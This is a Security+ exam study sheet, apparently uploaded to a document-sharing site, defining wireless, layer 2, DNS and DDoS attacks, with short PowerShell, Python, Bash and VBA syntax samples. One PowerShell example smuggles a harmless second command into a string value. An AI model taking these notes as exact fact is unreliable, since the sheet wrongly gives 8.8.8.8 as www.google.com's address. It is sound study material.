Add to collection(s) Add to saved
  1. No category
Uploaded by Ken Eromosele

Wireless

advertisement 
Wireless
Wireless network attacks attempt to take advantage of vulnerabilities in wireless
protocols as well as interfere with the wireless network or create false wireless access
points to gain entry to a network or steal information.
evil twin—An evil twin is an access point (AP) that is created on a wireless network that
appears to be legitimate. An evil twin connection will often mimic a legitimate AP using
the same SSID but may have a stronger connection, tricking targets into joining the
network through the evil twin AP.
rogue access point—A rogue access point is an unauthorized AP that shows up when
looking for a wireless connection. For example, if you are in a coffee shop and attempt
to connect to the shop’s wireless network, you may see numerous available networks
that are being broadcast from various devices within the shop, along with the legitimate
coffee shop Wi-Fi AP.
bluesnarfing—Bluesnarfing is a Bluetooth attack that gains unauthorized access to a
device via the Bluetooth connection. Bluesnarfing attacks are intended for the
exfiltration of information such as credentials.
bluejacking—Bluejacking is a Bluetooth attack that sends unsolicited messages to a
target device via a Bluetooth connection.
disassociation—Disassociation occurs when a device is disconnected from an AP.
Attackers may force disassociation of a target device in order to trick the target into
reconnecting via an illegitimate connection, such as a rogue access point.
jamming—Jamming is an attack that blocks traffic from communicating in a targeted
frequency or range.
radio frequency identification (RFID)—RFID is a short-range wireless technology that
uses radio frequencies to communicate information between a tag and a reader. An
RFID has one-way communication with the reader that pulls information from the tag.
Attackers can take advantage of RFID communication by cloning, spoofing, or
modifying tags, or they can impersonate RFID readers.
near-field communication (NFC)—NFC is a short-range wireless technology, typically
four inches in range, that allows for small amounts of information to pass between
devices. NFC chips are often used in touchless payment systems. NFC can be
vulnerable to spoofing, interception, and replay attacks.
initialization Vector (IV)—The IV is a randomly selected value that is used to begin the
encryption process. IV attacks aim to decipher the IV used in the encryption process.
Only insecure wireless protocols, such as the original wireless security protocol WEP,
are currently susceptible to IV attacks.
On-Path Attack
An on-path attack is an attack that intercepts traffic as it is sent from one host to
another. This was formerly known as (and is often still referred to as) a man-in-themiddle attack. Intercepted traffic packets can be altered, delayed, or blocked by the
interceptor.
Layer 2 Attacks
Layer 2 in the OSI model is the data link layer. Layer 2 is responsible for the delivery of
frames between network nodes and attacks target frames in transit between network
nodes. Local access to the network is required to attack the data link layer.
address resolution protocol (ARP) poisoning—ARP poisoning occurs when malicious
ARP packets are sent to the default gateway with the intention of changing the MAC/IP
address pairings the ARP cache contains.
media access control (MAC) flooding—MAC flooding occurs when too many MAC
addresses are sent to a switch resulting in full CAM or MAC tables. When a CAM or MAC
table is full, the default setting of the switch is to broadcast to all ports on the switch.
MAC cloning—MAC cloning is the duplication of a MAC address. A cloned MAC address
can be used to access unauthorized networks or communication streams by imitating a
trusted MAC address.
Domain Name System (DNS)
DNS is an internet protocol that allows for the translation of domain names into their
corresponding IP address. For example, when you type a URL into a browser, you type
its domain name, such as www.google.com. This input is routed through a DNS server
that looks up www.google.com and matches it to its IP address (8.8.8.8) to establish a
connection.
domain hijacking—Domain hijacking changes the registration/ownership of a domain.
DNS poisoning—DNS poisoning can occur in two ways, either through an on-path
attack or through direct poisoning of the cache. With a DNS on-path poisoning attack,
the DNS request is intercepted and redirected to a malicious site. A DNS cache
poisoning attack is similar to a MAC poisoning attack in which the cache that contains
the DNS files is tainted.
Uniform Resource Locator (URL) redirection—URL redirection most commonly occurs
when alternate IP addresses for URLs are entered into a system’s host files.
domain reputation—Domain reputation is the legitimacy, health, and security of a
domain based on information from ISP and email providers. Domain reputation
services provide this information on most domains.
Distributed Denial-of-Service (DDoS)
A DDoS attack is a form of DoS attack that originates from multiple locations, networks,
and systems. DDoS attacks are difficult to stop due to their distributed nature and are
used to overwhelm or incapacitate a target system.
network—A network DDoS attack is the most common type of DDoS attack and is
aimed at disrupting an entire target network. Network DDoS attacks are either volume
or protocol based. A volume-based DDoS network attack attempts to disrupt the
system through the sheer volume of traffic sent to the network at once. Common
volume-based attacks are UDP and ICMP floods. A protocol-based DDoS network
attack targets the underlying protocols networks use. The most common protocolbased DDoS attack is the SYN flood.
application—An application DDoS attack targets the application layer.
operational technology (OT)—OT is the software and hardware that is used to control
devices and systems in buildings, factories, and other industries. An OT DDoS attack
uses the same methods as network and application DDoS attacks but specifically
targets OT. OT, for the purposes of the Security+ exam, includes internet of things (IoT)
devices.
Malicious Code or Script Execution
Malicious code is code that can be inserted or used for malicious means. Similar to
malware, malicious code is designed to disrupt or intercept communications.
Malicious code often uses built-in tools and protocols to leverage a system or network.
Test Note: You should be able to differentiate between basic coding samples.
PowerShell—PowerShell is the Windows scripting language. One indicator of
PowerShell code is the use of the “;” as a separator.
PS> $x=”Message1″ ; Write-Host $x
Message1
PS> $x=”Message1;Write-Host Busted” ; Write-Host $x
Message1;Write-Host Busted
Python—Python is a popular coding language with syntax similar to spoken language.
Python does not use { } as block delimiters and rarely uses “;”.
import whois
data = raw_input("Enter a domain: ")
w = whois.whois(data)
print w
Bash—Bash, which stands for Bourne Again Shell, is an interpreter that processes shell
commands.
progressBarWidth=20
# Function to draw progress bar
progressBar () {
# Calculate number of fill/empty slots in the bar
progress=$(echo "$progressBarWidth/$taskCount*$tasksDone" | bc -l)
macros—Macros are abbreviations of complicated inputs to a computer program and
can be used to reuse code. Macros can be tainted with malicious code and must be
used carefully.
Visual Basic for Applications (VBA)—VBA is an event-driven scripting language mainly
used by Microsoft for their office applications.
Sub Macro1()
'
' Macro1 Macro
'
' Range("B1").Select
' ActiveCell.FormulaR1C1 = "Hello World"
' Range("B2").Select
End Sub
Related documents
Real-World Wireless Network Security
Real-World Wireless Network Security
Chapter 7
Chapter 7
Allowing others to connect to my DLINK wireless network
Allowing others to connect to my DLINK wireless network
fifth generation
fifth generation
Download
advertisement